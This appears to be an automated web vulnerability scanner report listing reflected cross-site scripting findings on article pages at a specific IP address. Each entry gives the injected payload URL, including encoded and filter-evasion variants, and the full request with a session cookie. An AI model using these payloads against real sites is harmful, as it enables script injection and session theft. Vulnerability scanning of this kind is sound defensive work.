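Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c18.mhtml?'%20onmouseover=dfbhmg(6669)%20
2. Set parameter '%20onmouseover=dfbhmg(6669)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6669)
Request & response GET /index.php/article/c18.mhtml?'%20onmouseover=dfbhmg(6669)%20 HTTP/1.1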
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c18.mhtml
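Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c18.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6617))%20var=%20
2. Set parameter var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6617))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6617))
Request & response GET /index.php/article/c18.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6617))%20var=%20 HTTP/1.1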
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/23.mhtml
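Request method GET
Affected parameter value0
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/23'%20style=dfbhmg:expre/**/ssion(dfbhmg(6071))%20var=%20.mhtml
2. Set parameter value0'%20style=dfbhmg:expre/**/ssion(dfbhmg(6071))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6071))
Request & response GET /index.php/article/23'%20style=dfbhmg:expre/**/ssion(dfbhmg(6071))%20var=%20.mhtml HTTP/1.1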
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.html
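Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36/p2.html?'%20onmouseover=dfbhmg(6744)%20
2. Set parameter '%20onmouseover=dfbhmg(6744)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6744)
Request & response GET /index.php/article/c36/p2.html?'%20onmouseover=dfbhmg(6744)%20 HTTP/1.1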
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
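Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36/p2.html?var='%20onmouseover=%22dfbhmg(6042)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6042)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6042)
Request & response GET /index.php/article/c36/p2.html?var='%20onmouseover=%22dfbhmg(6042)%22%3e%20 HTTP/1.1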
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
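Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36/p2.html/'%20onmouseover=dfbhmg(6350)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6350)%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6350)
Request & response GET /index.php/article/c36/p2.html/'%20onmouseover=dfbhmg(6350)%20var=%20 HTTP/1.1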
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
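Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36/p2.html;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6974))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6974))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6974))
Request & response GET /index.php/article/c36/p2.html;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6974))%20var=%20 HTTP/1.1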
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
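Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.mhtml?'%20onmouseover=%22dfbhmg(6441)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6441)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6441)
Request & response GET /index.php/article/c36.mhtml?'%20onmouseover=%22dfbhmg(6441)%22%3e%20 HTTP/1.1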
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
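Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.mhtml?var='%20onmouseover=%22dfbhmg(6106)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6106)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6106)
Request & response GET /index.php/article/c36.mhtml?var='%20onmouseover=%22dfbhmg(6106)%22%3e%20 HTTP/1.1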
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
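Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36/p2.html'%20onmouseover=dfbhmg(6563)%20
2. Set parameter '%20onmouseover=dfbhmg(6563)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6563)
Request & response GET /index.php/article/c36/p2.html'%20onmouseover=dfbhmg(6563)%20 HTTP/1.1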
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
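Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.mhtml/'%20onmouseover=dfbhmg(6773)%20
2. Set parameter '%20onmouseover=dfbhmg(6773)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6773)
Request & response GET /index.php/article/c36.mhtml/'%20onmouseover=dfbhmg(6773)%20 HTTP/1.1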
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
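Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.mhtml;'%20onmouseover=%22dfbhmg(6222)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6222)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6222)
Request & response GET /index.php/article/c36.mhtml;'%20onmouseover=%22dfbhmg(6222)%22%3e%20 HTTP/1.1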
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
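Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.mhtml'%20onmouseover=%22dfbhmg(6143)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6143)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6143)
Request & response GET /index.php/article/c36.mhtml'%20onmouseover=%22dfbhmg(6143)%22%3e%20 HTTP/1.1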
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c22.mhtml
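Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c22.mhtml?'%20onmouseover=%22dfbhmg(6536)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6536)%22%3e%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6536)
Request & response GET /index.php/article/c22.mhtml?'%20onmouseover=%22dfbhmg(6536)%22%3e%20 HTTP/1.1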
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c22.html

URL http://202.201.39.48/index.php/article/c22.mhtml
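Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c22.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6422))%20var=%20
2. Set parameter var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6422))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6422))
Request & response GET /index.php/article/c22.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6422))%20var=%20 HTTP/1.1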
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c22.html

URL http://202.201.39.48/index.php/article/c16.mhtml
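Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c16.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6421))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6421))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6421))
Request & response GET /index.php/article/c16.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6421))%20var=%20 HTTP/1.1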
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c16.html

URL http://202.201.39.48/index.php/article/c16.mhtml
Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c16.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x39;%26%23x36;%26%23x29;%20
2. Set parameter var'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x39;%26%23x36;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6196)
Request & response GET /index.php/article/c16.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x39;%26%23x36;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c16.html

URL http://202.201.39.48/index.php/article/c19/p2.html
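Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.html?'%20onmouseover=%22dfbhmg(6376)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6376)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6376)
Request & response GET /index.php/article/c19/p2.html?'%20onmouseover=%22dfbhmg(6376)%22%3e%20var=%20 HTTP/1.1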
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
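Request method GET
Affected parameter var
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.html?var='%20onmouseover=%22dfbhmg(6477)%22%3e%20var=%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6477)%22%3e%20var=%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6477)
Request & response GET /index.php/article/c19/p2.html?var='%20onmouseover=%22dfbhmg(6477)%22%3e%20var=%20 HTTP/1.1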
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.html/'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x38;%26%23x39;%26%23x29;%20
2. Set parameter '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x38;%26%23x39;%26%23x29;%20
3. Match in the response headers and response body: onblur.*?dfbhmg(6989)
Request & response GET /index.php/article/c19/p2.html/'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x38;%26%23x39;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
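Request method GET
Affected parameter
Detection criteria 1. Modify the specified parameter to contain crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.html;'%20onmouseover=dfbhmg(6467)%20
2. Set parameter '%20onmouseover=dfbhmg(6467)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6467)
Request & response GET /index.php/article/c19/p2.html;'%20onmouseover=dfbhmg(6467)%20 HTTP/1.1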
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
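Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19/p2.html'%20onmouseover=dfbhmg(6143)%20
2. Set parameter '%20onmouseover=dfbhmg(6143)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6143)
Request & response GET /index.php/article/c19/p2.html'%20onmouseover=dfbhmg(6143)%20 HTTP/1.1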
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/page/17.mhtml
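Request method GET
Affected parameter value0
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6652)%20.mhtml
2. Set parameter value0"%20onmouseover=dfbhmg(6652)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6652)
Request & response GET /index.php/page/"%20onmouseover=dfbhmg(6652)%20.mhtml HTTP/1.1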
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
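Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.html?'%20onmouseover=dfbhmg(6741)%20
2. Set parameter '%20onmouseover=dfbhmg(6741)%20
3. Match in the response headers and response body: onmouseover.*?dfbhmg(6741)
Request & response GET /index.php/article/c17/p2.html?'%20onmouseover=dfbhmg(6741)%20 HTTP/1.1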
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
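Request method GET
Affected parameter var
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6384))%20var=%20
2. Set parameter var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6384))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6384))
Request & response GET /index.php/article/c17/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6384))%20var=%20 HTTP/1.1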
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
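Request method GET
Affected parameter
Detection criteria 1. Set the specified parameter to the crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17/p2.html/'%20style=dfbhmg:expre/**/ssion(dfbhmg(6652))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6652))%20var=%20
3. Match in the response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6652))
Request & response GET /index.php/article/c17/p2.html/'%20style=dfbhmg:expre/**/ssion(dfbhmg(6652))%20var=%20 HTTP/1.1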
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
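Request method GET
Affected parameter
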